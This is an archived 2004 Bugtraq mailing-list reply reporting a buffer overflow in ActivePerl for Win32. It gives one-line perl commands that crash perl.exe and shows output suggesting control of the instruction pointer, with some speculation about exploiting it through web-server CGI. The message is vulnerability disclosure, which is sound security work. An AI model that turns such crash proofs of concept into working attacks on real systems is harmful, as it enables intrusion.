Bugtraq mailing list archives
Re: Buffer Overflow in ActivePerl ?
From: Nick FitzGerald <nick () virus-l demon co uk>
Date: Wed, 19 May 2004 01:29:41 +1200
"Oliver () greyhat de" <Oliver () greyhat de> wrote:
i played around with ActiveState's ActivePerl for Win32, and crashed Perl.exe with the following command: perl -e "$a="A" x 256; system($a)"
Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus all but last week's security patch: perl -e "$a="A" x 256; system($a)" perl.exe - Application error Unhandled instruction at "0x77fcc83d" referenced memory at "0x00657865. The memory could not be "written". Also, it is likely exploitable -- push up the number of A's a bit: C:\>perl -e "$a="A" x 259; system($a)" perl.exe - Application error Unhandled instruction at "0x77fcc83d" referenced memory at "0x65004141. The memory could not be "written". and we seem to get control of EIP. Coincidence? Try yet two more: C:\>perl -e "$a="A" x 261; system($a)" perl.exe - Application error Unhandled instruction at "0x77fcc83d" referenced memory at "0x41414141. The memory could not be "written". Looks like full control of EIP... However, there is not likely to be a privilege escalation here unless perhaps a script processor on a web server can be cajoled into doing something with this?? (Not at all familiar with the innards of Windows web servers and their relationship to their CGI, etc processors...) -- Nick FitzGerald Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854
Current thread:
- Buffer Overflow in ActivePerl ? Oliver () greyhat de (May 17)
- Re: Buffer Overflow in ActivePerl ? rich . sf (May 18)
- RE: [Full-Disclosure] Re: Buffer Overflow in ActivePerl ? Bill Royds (May 18)
- Re: Buffer Overflow in ActivePerl ? Josh Tolley (May 18)
- Re: Buffer Overflow in ActivePerl? Axel Beckert (May 18)
- Re: Buffer Overflow in ActivePerl ? Nick FitzGerald (May 18)
- <Possible follow-ups>
- Re: Buffer Overflow in ActivePerl ? noderat (May 18)
- RE: Buffer Overflow in ActivePerl ? Drew Copley (May 18)
- Re: Buffer Overflow in ActivePerl ? David Cantrell (May 19)
- Re: Buffer Overflow in ActivePerl ? David Ahmad (May 19)
- Re: Buffer Overflow in ActivePerl ? David Cantrell (May 19)
- Re: Buffer Overflow in ActivePerl ? rich . sf (May 18)